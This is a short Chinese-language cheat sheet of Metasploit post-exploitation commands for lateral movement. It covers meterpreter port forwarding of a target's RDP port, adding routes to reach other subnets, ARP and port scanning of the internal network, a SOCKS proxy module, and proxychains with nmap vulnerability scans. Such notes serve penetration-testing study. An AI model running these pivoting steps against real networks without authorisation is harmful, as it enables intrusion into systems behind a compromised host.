MSF横向之MSF端口转发+路由表+SOCKS5+proxychains

MSF后渗透的一些操作
端口转发

meterpreter > portfwd  add -l 2222 -r 172.16.1.156 -p 3389 #将目标机172.16.1.156的3389端口转发到本地2222端口
meterpreter > portfwd list	#查看转发列表
meterpreter > portfwd flush	#清空转发列表

rdesktop 127.0.0.1:2222    #kali远程桌面使用2222端口

添加路由，横向渗透（跨网段攻击）

run autoroute -s 172.16.2.0/24  #添加到目标环境网络
run autoroute –p          #查看添加的路由
route print 	#打印路由

run post/windows/gather/arp_scanner RHOSTS=172.16.2.0/24  #扫描整个段存活主机

run auxiliary/scanner/portscan/tcp RHOSTS=172.16.2.11 PORTS=3389  #检查IP是否开放3389

利用arp扫描内网主机

use post/windows/gather/arp_scanner
set rhosts 172.16.2.0/24
set session 1
exploit

Socks代理篇
新版的msf和老版的不一样，代理模块也不一样。
auxiliary/server/socks_proxy

msf6 auxiliary(server/socks_proxy) > set srvport 7777
srvport => 7777
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

[*] Starting the SOCKS proxy server

配置proxychains
用代理软件去连接建立好的socks隧道，便可以成功访问内网。

vi /etc/proxychains.conf #添加 socks5 127.0.0.1 7777

proxychains+nmap扫描主机是否存在漏洞

proxychains nmap -sT -Pn -p445 --script=vuln 192.168.52.141

proxychains使用msf框架

proxychains msfconsole